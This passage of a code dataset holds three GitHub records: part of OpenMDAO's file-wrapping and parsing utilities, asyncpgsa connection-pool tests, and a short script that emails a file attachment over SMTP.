self._replace_location = location\n self._current_location = 0\n\n def set_array(self, newtext, start_location, end_location):\n \"\"\"\n Set a new starting location, ending location, and value for replacement.\n\n Parameters\n ----------\n newtext : str\n text to insert.\n start_location : int\n location\n end_location : int\n location\n \"\"\"\n self._newtext = newtext\n self._start_location = start_location\n self._end_location = end_location\n self._current_location = 0\n\n def replace(self, text):\n \"\"\"\n Replace text in file.\n\n This function should be passed to re.sub.\n\n Parameters\n ----------\n text : str\n text to insert.\n\n Returns\n -------\n string\n newtext if current location is replace location else the input text.\n \"\"\"\n self._current_location += 1\n\n if self._current_location == self._replace_location:\n if isinstance(self._newtext, float):\n return _getformat(self._newtext) % self._newtext\n else:\n return str(self._newtext)\n else:\n return text.group()\n\n def replace_array(self, text):\n \"\"\"\n Replace array of text values in file.\n\n This function should be passed to re.sub.\n\n Parameters\n ----------\n text : str\n text to insert.\n\n Returns\n -------\n string\n newtext if current location is replace location else the input text.\n \"\"\"\n self._current_location += 1\n end = len(self._newtext)\n\n if self._current_location >= self._start_location and \\\n self._current_location <= self._end_location and \\\n self._counter < end:\n if isinstance(self._newtext[self._counter], float):\n val = self._newtext[self._counter]\n newval = _getformat(val) % 
val\n else:\n newval = str(self._newtext[self._counter])\n self._counter += 1\n return newval\n else:\n return text.group()\n\n\nclass _ToInteger(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into an int.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into an integer.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n int\n integer value for token.\n \"\"\"\n return int(tokenlist[0])\n\n\nclass _ToFloat(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into a float.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into a float.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n float value for token.\n \"\"\"\n return float(tokenlist[0].replace('D', 'E'))\n\n\nclass _ToNan(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into Python nan.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into Python nan.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n the float value for NaN.\n \"\"\"\n return float('nan')\n\n\nclass _ToInf(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into Python inf.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into Python inf.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n the float value for infinity.\n \"\"\"\n return float('inf')\n\n\nclass InputFileGenerator(object):\n \"\"\"\n Utility to generate an input file from a template.\n\n Substitution of values is supported. Data is located with a simple API.\n\n Attributes\n ----------\n _template_filename : str or None\n the name of the template file.\n _output_filename : str or None\n the name of the output file.\n _delimiter : int\n delimiter.\n _reg : int\n regular expression.\n _data : list of string\n the contents of the file, by line\n _current_row : int\n the current row of the file\n _anchored : bool\n indicator that position is relative to a landmark location.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize attributes.\n \"\"\"\n if pyparsing is None:\n raise RuntimeError(\"The 'pyparsing' package is required to use the file wrapping \"\n \"utilities but it is not installed. 
Try 'pip install pyparsing'.\")\n\n self._template_filename = None\n self._output_filename = None\n\n self._delimiter = \" \"\n self._reg = re.compile('[^ \\n]+')\n\n self._data = []\n self._current_row = 0\n self._anchored = False\n\n def set_template_file(self, filename):\n \"\"\"\n Set the name of the template file to be used.\n\n The template file is also read into memory when this method is called.\n\n Parameters\n ----------\n filename : str\n Name of the template file to be used.\n \"\"\"\n self._template_filename = filename\n\n templatefile = open(filename, 'r')\n self._data = templatefile.readlines()\n templatefile.close()\n\n def set_generated_file(self, filename):\n \"\"\"\n Set the name of the file that will be generated.\n\n Parameters\n ----------\n filename : str\n Name of the input file to be generated.\n \"\"\"\n self._output_filename = filename\n\n def set_delimiters(self, delimiter):\n \"\"\"\n Set the delimiters that are used to identify field boundaries.\n\n Parameters\n ----------\n delimiter : str\n A string containing characters to be used as delimiters.\n \"\"\"\n self._delimiter = delimiter\n self._reg = re.compile('[^' + delimiter + '\\n]+')\n\n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"\n Mark the location of a landmark.\n\n This lets you describe data by relative position. Note that a forward\n search begins at the old anchor location. If you want to restart the\n search for the anchor at the file beginning, then call ``reset_anchor()``\n before ``mark_anchor``.\n\n Parameters\n ----------\n anchor : str\n The text you want to search for.\n\n occurrence : int, optional\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\n \"\"\"\n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n\n instance = 0\n if occurrence > 0:\n count = 0\n max_lines = len(self._data)\n for index in range(self._current_row, max_lines):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self._anchored:\n line = line.split(anchor)[-1]\n\n if line.find(anchor) > -1:\n\n instance += 1\n if instance == occurrence:\n self._current_row += count\n self._anchored = True\n return\n\n count += 1\n\n elif occurrence < 0:\n max_lines = len(self._data) - 1\n count = max_lines\n for index in range(max_lines, -1, -1):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == max_lines and self._anchored:\n line = line.split(anchor)[0]\n\n if line.find(anchor) > -1:\n instance += -1\n if instance == occurrence:\n self._current_row = count\n self._anchored = True\n return\n\n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n\n raise RuntimeError(\"Could not find pattern %s in template file %s\" %\n (anchor, self._template_filename))\n\n def reset_anchor(self):\n \"\"\"\n Reset anchor to the beginning of the file.\n \"\"\"\n self._current_row = 0\n self._anchored = False\n\n def transfer_var(self, value, row, field):\n \"\"\"\n Change a single variable in the template relative to the current anchor.\n\n Parameters\n ----------\n value : float, int, bool, str\n New value to set at the 
location.\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n field : int\n Which word in line to replace, as denoted by delimiter(s).\n \"\"\"\n j = self._current_row + row\n line = self._data[j]\n\n sub = _SubHelper()\n sub.set(value, field)\n newline = re.sub(self._reg, sub.replace, line)\n\n self._data[j] = newline\n\n def transfer_array(self, value, row_start, field_start, field_end,\n row_end=None, sep=\", \"):\n \"\"\"\n Change the values of an array in the template relative to the current anchor.\n\n This should generally be used for one-dimensional or free form arrays.\n\n Parameters\n ----------\n value : float, int, bool, str\n Array of values to insert.\n row_start : int\n Starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n field_start : int\n Starting field in the given row_start as denoted by\n delimiter(s).\n field_end : int\n The final field the array uses in row_end.\n We need this to figure out if the template is too small or large.\n row_end : int, optional\n Use if the array wraps to cover additional lines.\n sep : int, optional\n Separator to use if we go beyond the template.\n \"\"\"\n # Simplified input for single-line arrays\n if row_end is None:\n row_end = row_start\n\n sub = _SubHelper()\n\n for row in range(row_start, row_end + 1):\n j = self._current_row + row\n line = self._data[j]\n\n if row == row_end:\n f_end = field_end\n else:\n f_end = 99999\n\n sub.set_array(value, field_start, f_end)\n field_start = 0\n\n newline = re.sub(self._reg, sub.replace_array, line)\n self._data[j] = newline\n\n # Sometimes an array is too large for the example in the template\n # This is resolved by adding more fields at the end\n if sub._counter < len(value):\n for val in value[sub._counter:]:\n newline = newline.rstrip() + sep + str(val)\n self._data[j] = newline\n\n # Sometimes an array is too small for the template\n # This is resolved by removing fields\n elif sub._counter > len(value):\n # TODO - Figure out how to handle this.\n # Ideally, we'd remove the extra field placeholders\n raise ValueError(\"Array is too small for the template.\")\n\n def transfer_2Darray(self, value, row_start, row_end, field_start, field_end):\n \"\"\"\n Change the values of a 2D array in the template relative to the current anchor.\n\n This method is specialized for 2D arrays, where each row of the array is\n on its own line.\n\n Parameters\n ----------\n value : ndarray\n Array of values to insert.\n row_start : int\n Starting row for inserting the array. 
This is relative\n to the anchor, and can be negative.\n row_end : int\n Final row for the array, relative to the anchor.\n field_start : int\n Starting field in the given row_start as denoted by\n delimiter(s).\n field_end : int\n The final field the array uses in row_end.\n We need this to figure out if the template is too small or large.\n \"\"\"\n sub = _SubHelper()\n\n i = 0\n\n for row in range(row_start, row_end + 1):\n j = self._current_row + row\n line = self._data[j]\n\n sub.set_array(value[i, :], field_start, field_end)\n\n newline = re.sub(self._reg, sub.replace_array, line)\n self._data[j] = newline\n\n sub._current_location = 0\n sub._counter = 0\n i += 1\n\n # TODO - Note, we currently can't handle going beyond the end of\n # the template line\n\n def clearline(self, row):\n \"\"\"\n Replace the contents of a row with the newline character.\n\n Parameters\n ----------\n row : int\n Row number to clear, relative to current anchor.\n \"\"\"\n self._data[self._current_row + row] = \"\\n\"\n\n def generate(self, return_data=False):\n \"\"\"\n Use the template file to generate the input file.\n\n Parameters\n ----------\n return_data : bool\n If True, generated file data will be returned as a string.\n\n Returns\n -------\n string\n The generated file data if return_data is True or output filename\n has not been provided, else None.\n \"\"\"\n if self._output_filename:\n with open(self._output_filename, 'w') as f:\n f.writelines(self._data)\n else:\n return_data = True\n\n if return_data:\n return '\\n'.join(self._data)\n else:\n return None\n\n\nclass FileParser(object):\n \"\"\"\n Utility to locate and read data from a file.\n\n Parameters\n ----------\n end_of_line_comment_char : str, optional\n End-of-line comment character to be ignored\n (e.g., Python supports in-line comments with \"#\").\n\n full_line_comment_char : str, optional\n Comment character that signifies a line should be skipped.\n\n Attributes\n ----------\n _filename : str\n the name of the file.\n _data : list of string\n the contents of the file, by line\n _delimiter : str\n the name of the file.\n _end_of_line_comment_char : str\n end-of-line comment character to be ignored.\n _full_line_comment_char : str\n comment character that signifies a line should be skipped.\n _current_row : int\n the current row of the file.\n _anchored : bool\n indicator that position is relative to a landmark location.\n \"\"\"\n\n def __init__(self, end_of_line_comment_char=None, full_line_comment_char=None):\n \"\"\"\n Initialize attributes.\n \"\"\"\n if pyparsing is None:\n raise RuntimeError(\"The 'pyparsing' package is required to use the file wrapping \"\n \"utilities but it is not installed. 
Try 'pip install pyparsing'.\")\n\n self._filename = None\n self._data = []\n\n self._delimiter = \" \\t\"\n self._end_of_line_comment_char = end_of_line_comment_char\n self._full_line_comment_char = full_line_comment_char\n\n self._current_row = 0\n self._anchored = False\n\n self.set_delimiters(self._delimiter)\n\n def set_file(self, filename):\n \"\"\"\n Set the name of the file that will be generated.\n\n Parameters\n ----------\n filename : str\n Name of the input file to be generated.\n \"\"\"\n self._filename = filename\n\n inputfile = open(filename, 'r')\n\n if not self._end_of_line_comment_char and not self._full_line_comment_char:\n self._data = inputfile.readlines()\n else:\n self._data = []\n for line in inputfile:\n if line[0] == self._full_line_comment_char:\n continue\n self._data.append(line.split(self._end_of_line_comment_char)[0])\n\n inputfile.close()\n\n def set_delimiters(self, delimiter):\n r\"\"\"\n Set the delimiters that are used to identify field boundaries.\n\n Parameters\n ----------\n delimiter : str\n A string containing characters to be used as delimiters. The\n default value is ' \\t', which means that spaces and tabs are not\n taken as data but instead mark the boundaries. Note that the\n parser is smart enough to recognize characters within quotes as\n non-delimiters.\n \"\"\"\n self._delimiter = delimiter\n\n if delimiter != \"columns\":\n ParserElement.setDefaultWhitespaceChars(str(delimiter))\n\n self._reset_tokens()\n\n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"\n Mark the location of a landmark, which lets you describe data by relative position.\n\n Note that a forward search begins at the old anchor location. If you want to restart\n the search for the anchor at the file beginning, then call ``reset_anchor()`` before\n ``mark_anchor``.\n\n Parameters\n ----------\n anchor : str\n The text you want to search for.\n occurrence : int\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. 
Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\n \"\"\"\n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n\n instance = 0\n\n if occurrence > 0:\n count = 0\n max_lines = len(self._data)\n for index in range(self._current_row, max_lines):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self._anchored:\n line = line.split(anchor)[-1]\n\n if anchor in line:\n\n instance += 1\n if instance == occurrence:\n self._current_row += count\n self._anchored = True\n return\n\n count += 1\n\n elif occurrence < 0:\n max_lines = len(self._data) - 1\n count = max_lines\n for index in range(max_lines, -1, -1):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == max_lines and self._anchored:\n line = line.split(anchor)[0]\n\n if anchor in line:\n instance += -1\n if instance == occurrence:\n self._current_row = count\n self._anchored = True\n return\n\n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n\n raise RuntimeError(\"Could not find pattern %s in output file %s\" %\n (anchor, self._filename))\n\n def reset_anchor(self):\n \"\"\"\n Reset anchor to the beginning of the file.\n \"\"\"\n self._current_row = 0\n self._anchored = False\n\n def transfer_line(self, row):\n \"\"\"\n Return an entire line, relative to current anchor.\n\n Parameters\n ----------\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n\n Returns\n -------\n string\n Line at the location requested.\n \"\"\"\n return self._data[self._current_row + row].rstrip()\n\n def transfer_var(self, row, field, fieldend=None):\n \"\"\"\n Get a single variable relative to the current anchor.\n\n Parameters\n ----------\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n field : int\n If the delimiter is a set of chars: which word in line to retrieve.\n If the delimiter is 'columns': character position to start.\n fieldend : int (optional)\n If the delimiter is a set of chars: IGNORED.\n If the delimiter is 'columns': position of last character to return, or if\n omitted, the end of the line is used.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n j = self._current_row + row\n\n line = self._data[j]\n\n if self._delimiter == \"columns\":\n if not fieldend:\n line = line[(field - 1):]\n else:\n line = line[(field - 1):(fieldend)]\n\n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n data = self._parse_line().parseString(line)\n\n # data might have been split if it contains whitespace. 
If so,\n # just return the whole string\n if len(data) > 1:\n return line\n else:\n return data[0]\n else:\n data = self._parse_line().parseString(line)\n return data[field - 1]\n\n def transfer_keyvar(self, key, field, occurrence=1, rowoffset=0):\n \"\"\"\n Search for a key relative to the current anchor and get a field from that line.\n\n You can do the same thing with a call to ``mark_anchor`` and ``transfer_var``.\n This function just combines them for convenience.\n\n Parameters\n ----------\n key : str\n The key to search for.\n field : int\n Which field to transfer. Field 0 is the key.\n occurrence : int\n Find nth instance of text; default is 1 (first value\n field). Use -1 to find last occurance. Position 0 is the key\n field, so it should not be used as a value for occurrence.\n rowoffset : int (optional)\n Optional row offset from the occurrence of key. This can\n also be negative.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n if not isinstance(occurrence, int) or occurrence == 0:\n msg = \"The value for occurrence must be a nonzero integer\"\n raise ValueError(msg)\n\n instance = 0\n if occurrence > 0:\n row = 0\n for line in self._data[self._current_row:]:\n if line.find(key) > -1:\n instance += 1\n if instance == occurrence:\n break\n row += 1\n\n elif occurrence < 0:\n row = -1\n for line in reversed(self._data[self._current_row:]):\n if line.find(key) > -1:\n instance += -1\n if instance == occurrence:\n break\n row -= 1\n\n j = self._current_row + row + rowoffset\n line = self._data[j]\n\n fields = self._parse_line().parseString(line.replace(key, \"KeyField\"))\n\n return fields[field]\n\n def transfer_array(self, rowstart, fieldstart, rowend=None, fieldend=None):\n \"\"\"\n Get an array of variables relative to the current anchor.\n\n Setting the delimiter to 'columns' elicits some special behavior\n from this method. Normally, the extraction process wraps around\n at the end of a line and continues grabbing each field at the start of\n a newline. When the delimiter is set to columns, the parameters\n (rowstart, fieldstart, rowend, fieldend) demark a box, and all\n values in that box are retrieved. Note that standard whitespace\n is the secondary delimiter in this case.\n\n Parameters\n ----------\n rowstart : int\n Row number to start, relative to the current anchor.\n fieldstart : int\n Field number to start.\n rowend : int, optional\n Row number to end. If not set, then only one row is grabbed.\n fieldend : int\n Field number to end.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n j1 = self._current_row + rowstart\n\n if rowend is None:\n j2 = j1 + 1\n else:\n j2 = self._current_row + rowend + 1\n\n if not fieldend:\n raise ValueError(\"fieldend is missing, currently required\")\n\n lines = self._data[j1:j2]\n\n data = np.zeros(shape=(0, 0))\n\n for i, line in enumerate(lines):\n if self._delimiter == \"columns\":\n line = line[(fieldstart - 1):fieldend]\n\n # Stripping whitespace may be controversial.\n line = line.strip()\n\n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n parsed = self._parse_line().parseString(line)\n\n newdata = np.array(parsed[:])\n # data might have been split if it contains whitespace. 
If the\n # data is string, we probably didn't want this.\n if newdata.dtype.type is np.str_:\n newdata = np.array(line)\n\n data = np.append(data, newdata)\n else:\n parsed = self._parse_line().parseString(line)\n\n if i == j2 - j1 - 1:\n data = np.append(data, np.array(parsed[(fieldstart - 1):fieldend]))\n else:\n data = np.append(data, np.array(parsed[(fieldstart - 1):]))\n\n fieldstart = 1\n\n return data\n\n def transfer_2Darray(self, rowstart, fieldstart, rowend, fieldend=None):\n \"\"\"\n Get a 2D array of variables relative to the current anchor.\n\n Each line of data is placed in a separate row.\n\n If the delimiter is set to 'columns', then the values contained in\n fieldstart and fieldend should be the column number instead of the\n field number.\n\n Parameters\n ----------\n rowstart : int\n Row number to start, relative to the current anchor.\n fieldstart : int\n Field number to start.\n rowend : int\n Row number to end relative to current anchor.\n fieldend : int (optional)\n Field number to end. If not specified, grabs all fields up to the\n end of the line.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n if fieldend and (fieldstart > fieldend):\n msg = \"fieldend must be greater than fieldstart\"\n raise ValueError(msg)\n\n if rowstart > rowend:\n msg = \"rowend must be greater than rowstart\"\n raise ValueError(msg)\n\n j1 = self._current_row + rowstart\n j2 = self._current_row + rowend + 1\n lines = list(self._data[j1:j2])\n\n if self._delimiter == \"columns\":\n if fieldend:\n line = lines[0][(fieldstart - 1):fieldend]\n else:\n line = lines[0][(fieldstart - 1):]\n\n parsed = self._parse_line().parseString(line)\n row = np.array(parsed[:])\n data = np.zeros(shape=(abs(j2 - j1), len(row)))\n data[0, :] = row\n\n for i, line in enumerate(list(lines[1:])):\n if fieldend:\n line = line[(fieldstart - 1):fieldend]\n else:\n line = line[(fieldstart - 1):]\n\n parsed = self._parse_line().parseString(line)\n data[i + 1, :] = np.array(parsed[:])\n else:\n parsed = self._parse_line().parseString(lines[0])\n if fieldend:\n row = np.array(parsed[(fieldstart - 1):fieldend])\n else:\n row = np.array(parsed[(fieldstart - 1):])\n\n data = np.zeros(shape=(abs(j2 - j1), len(row)))\n data[0, :] = row\n\n for i, line in enumerate(list(lines[1:])):\n parsed = self._parse_line().parseString(line)\n\n if fieldend:\n try:\n data[i + 1, :] = np.array(parsed[(fieldstart - 1):fieldend])\n except Exception:\n print(data)\n else:\n data[i + 1, :] = np.array(parsed[(fieldstart - 1):])\n\n return data\n\n def _parse_line(self):\n \"\"\"\n Parse a single data line that may contain string or numerical data.\n\n Float and Int 'words' are converted to their appropriate type.\n Exponentiation is supported, as are NaN and Inf.\n\n Returns\n -------\n \n the parsed line.\n \"\"\"\n return self.line_parse_token\n\n def _reset_tokens(self):\n \"\"\"\n Set up the tokens for pyparsing.\n \"\"\"\n # Somewhat of a hack, but we can only use printables if the delimiter is\n # just whitespace. Otherwise, some seprators (like ',' or '=') potentially\n # get parsed into the general string text. 
So, if we have non whitespace\n # delimiters, we need to fall back to just alphanums, and then add in any\n # missing but important symbols to parse.\n if self._delimiter.isspace():\n textchars = printables\n else:\n textchars = alphanums\n\n symbols = ['.', '/', '+', '*', '^', '(', ')', '[', ']', '=',\n ':', ';', '?', '%', '&', '!', '#', '|', '<', '>',\n '{', '}', '-', '_', '@', '$', '~']\n\n for symbol in symbols:\n if symbol not in self._delimiter:\n textchars = textchars + symbol\n\n digits = Word(nums)\n dot = \".\"\n sign = oneOf(\"+ -\")\n ee = CaselessLiteral('E') | CaselessLiteral('D')\n\n num_int = _ToInteger(Combine(Optional(sign) + digits))\n\n num_float = _ToFloat(Combine(\n Optional(sign) +\n ((digits + dot + Optional(digits)) | (dot + digits)) +\n Optional(ee + Optional(sign) + digits)\n ))\n\n # special case for a float written like \"3e5\"\n mixed_exp = _ToFloat(Combine(digits + ee + Optional(sign) + digits))\n\n nan = (_ToInf(oneOf(\"Inf -Inf\")) |\n _ToNan(oneOf(\"NaN nan NaN% NaNQ NaNS qNaN sNaN 1.#SNAN 1.#QNAN -1.#IND\")))\n\n string_text = Word(textchars)\n\n self.line_parse_token = (OneOrMore((nan | num_float | mixed_exp | num_int | string_text)))\n", "repo_name": "OpenMDAO/OpenMDAO", "sub_path": "openmdao/utils/file_wrap.py", "file_name": "file_wrap.py", "file_ext": "py", "file_size_in_byte": 34305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 451, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyparsing.TokenConverter", "line_number": 16, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 170, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 196, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 222, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 248, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 310, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 354, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 453, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 500, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 550, "usage_type": "call"}, {"api_name": "pyparsing.ParserElement.setDefaultWhitespaceChars", "line_number": 689, "usage_type": "call"}, {"api_name": "pyparsing.ParserElement", "line_number": 689, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 929, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 942, "usage_type": "call"}, {"api_name": "numpy.str_", "line_number": 945, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 946, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 948, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1007, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1008, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1018, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1026, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1034, "usage_type": 
"call"}, {"api_name": "numpy.array", "line_number": 1038, "usage_type": "call"}, {"api_name": "pyparsing.printables", "line_number": 1066, "usage_type": "name"}, {"api_name": "pyparsing.alphanums", "line_number": 1068, "usage_type": "name"}, {"api_name": "pyparsing.Word", "line_number": 1078, "usage_type": "call"}, {"api_name": "pyparsing.nums", "line_number": 1078, "usage_type": "argument"}, {"api_name": "pyparsing.oneOf", "line_number": 1080, "usage_type": "call"}, {"api_name": "pyparsing.CaselessLiteral", "line_number": 1081, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1083, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1083, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1085, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1086, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1087, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1088, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1092, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1092, "usage_type": "call"}, {"api_name": "pyparsing.oneOf", "line_number": 1094, "usage_type": "call"}, {"api_name": "pyparsing.oneOf", "line_number": 1095, "usage_type": "call"}, {"api_name": "pyparsing.Word", "line_number": 1097, "usage_type": "call"}, {"api_name": "pyparsing.OneOrMore", "line_number": 1099, "usage_type": "call"}]}
+{"seq_id": "35151197031", "text": "import sqlalchemy as sa\n\n\nasync def test_pool_basic(pool):\n async with pool.acquire() as con:\n result = await con.fetch('SELECT * FROM sqrt(16)')\n assert result[0]['sqrt'] == 4.0\n\n\nasync def test_pool_connection_transaction_context_manager(pool):\n async with pool.transaction() as conn:\n result = await conn.fetch('SELECT * FROM sqrt(16)')\n\n assert result[0]['sqrt'] == 4.0\n\n\nasync def test_use_sqlalchemy_with_escaped_params(pool):\n \"\"\"\n Use sqlalchemy with escaped params\n Make sure that the escaped parameters get used in the right order\n :return:\n \"\"\"\n query = sa.select('*') \\\n .select_from(sa.text('sqrt(:num) as a')) \\\n .select_from(sa.text('sqrt(:a2) as b')) \\\n .select_from(sa.text('sqrt(:z3) as c')) \\\n .params(num=16, a2=36, z3=25)\n async with pool.transaction() as conn:\n result = await conn.fetch(query)\n\n row = result[0]\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n\nasync def test_use_sa_core_objects(pool):\n pg_tables = sa.Table(\n 'pg_tables', sa.MetaData(),\n sa.Column('schemaname'),\n sa.Column('tablename'),\n sa.Column('tableowner'),\n sa.Column('tablespace'),\n sa.Column('hasindexes')\n )\n\n query = pg_tables.select().where(pg_tables.c.schemaname == 'pg_catalog')\n async with pool.transaction() as conn:\n result = await conn.fetch(query)\n\n for row in result:\n # just making sure none of these throw KeyError exceptions\n assert isinstance(row['schemaname'], str)\n assert 'tablename' in row\n assert 'tableowner' in row\n assert 'tablespace' in row\n assert 'hasindexes' in row\n\n\nasync def test_with_without_async_should_throw_exception(pool):\n try:\n with pool.transaction() as conn:\n result = await conn.fetch('SELECT * FROM sqrt(16)')\n\n raise Exception('Should have thrown RuntimeError')\n except RuntimeError as e:\n assert str(e) == 'Must use \"async with\" for a transaction'\n\nasync def test_falsyness_of_rows_on_fetch(pool):\n async with pool.acquire() as conn:\n rows = await conn.fetch('SELECT * FROM pg_stat_activity '\n 'WHERE pid=400')\n assert bool(rows) == False\n", "repo_name": "CanopyTax/asyncpgsa", "sub_path": "tests/test_pool.py", "file_name": "test_pool.py", "file_ext": "py", "file_size_in_byte": 2300, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 411, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.select", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 39, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "30647574825", "text": "import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n\ndef send_email(my_email):\n fromaddr = my_email.fromaddr\n toaddr = my_email.toaddr\n msg = MIMEMultipart()\n msg['From'] = fromaddr\n msg['To'] = toaddr\n msg['Subject'] = \"Subject of the Mail\"\n body = \"Body_of_the_mail\"\n msg.attach(MIMEText(body, 'plain'))\n filename = my_email.filepath.rpartition('\\\\')[-1]\n attachment = open(my_email.filepath, \"rb\")\n p = MIMEBase('application', 'octet-stream')\n p.set_payload(attachment.read())\n encoders.encode_base64(p)\n p.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n msg.attach(p)\n s = smtplib.SMTP('smtp.gmail.com', 587)\n s.ehlo()\n s.starttls()\n s.login(fromaddr, my_email.password)\n text = msg.as_string()\n s.sendmail(fromaddr, toaddr, text)\n s.quit()\n\ndef main(my_email):\n send_email(my_email)\n\nif __name__ == '__main__':\n main(my_email)", "repo_name": "petyapython/pack_and_send", "sub_path": "send.py", "file_name": "send.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 11, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 16, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 19, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 21, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 21, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 24, "usage_type": "call"}]}
